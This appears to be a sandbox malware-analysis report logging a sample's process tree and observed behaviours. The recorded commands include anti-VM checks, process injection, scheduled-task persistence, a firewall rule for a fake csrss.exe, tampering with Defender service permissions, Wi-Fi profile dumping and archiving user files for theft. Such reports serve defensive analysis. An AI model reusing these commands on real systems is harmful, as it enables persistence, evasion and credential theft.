- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 2612 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 4848 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 4848 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
- PID 3712 chrome.exe wrote to memory of PID 3552 chrome.exe
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Level 2: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Level 3: C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
Level 3: C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
Level 3: C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exe"
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcca0fab58,0x7ffcca0fab68,0x7ffcca0fab78
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:2
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:8
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2132 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:8
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:1
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3028 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:1
Level 5: C:\Program Files\Google\Chrome\Application\chrome.exe
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4212 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4048 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 --field-trial-handle=1768,i,1864251316948117499,2617369535366440079,131072 /prefetch:85⤵
-
C:\Users\Admin\1000017002\1d10cce2fa.exe"C:\Users\Admin\1000017002\1d10cce2fa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 9123⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 3923⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 4003⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2i0.0.exe"C:\Users\Admin\AppData\Local\Temp\u2i0.0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2i0.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2i0.2\run.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\u2i0.3.exe"C:\Users\Admin\AppData\Local\Temp\u2i0.3.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 15724⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 3844⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000231001\lie.exe"C:\Users\Admin\AppData\Local\Temp\1000231001\lie.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\938118698296_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
-
C:\Users\Admin\Pictures\JsU0mIy1ntpEgKLvpkZIxeHv.exe"C:\Users\Admin\Pictures\JsU0mIy1ntpEgKLvpkZIxeHv.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u1rs.0.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.0.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 34326⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u1rs.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\u1rs.3.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.3.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 15525⤵
- Program crash
-
C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"C:\Users\Admin\Pictures\0uGYhodtbvJDiZVw84LSAglJ.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"C:\Users\Admin\Pictures\wPMduSZ8juY1TDHBUix0ljLR.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\87SWjL22hQPaCpSfqo5grzwC.exe"C:\Users\Admin\Pictures\87SWjL22hQPaCpSfqo5grzwC.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe"C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exeC:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6af7e1d0,0x6af7e1dc,0x6af7e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BCeXl9xTBcqb6RTpV0ci0ClD.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BCeXl9xTBcqb6RTpV0ci0ClD.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe"C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4876 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428043527" --session-guid=922f0eff-0f84-4924-a69b-2c814f17cfb6 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=30050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exeC:\Users\Admin\Pictures\BCeXl9xTBcqb6RTpV0ci0ClD.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x13c,0x2c8,0x6a5fe1d0,0x6a5fe1dc,0x6a5fe1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe" --version5⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280435271\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x1026038,0x1026044,0x10260506⤵
-
C:\Users\Admin\Pictures\TSG0dxvUxIJDY4V4LguJj7eN.exe"C:\Users\Admin\Pictures\TSG0dxvUxIJDY4V4LguJj7eN.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS7942.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
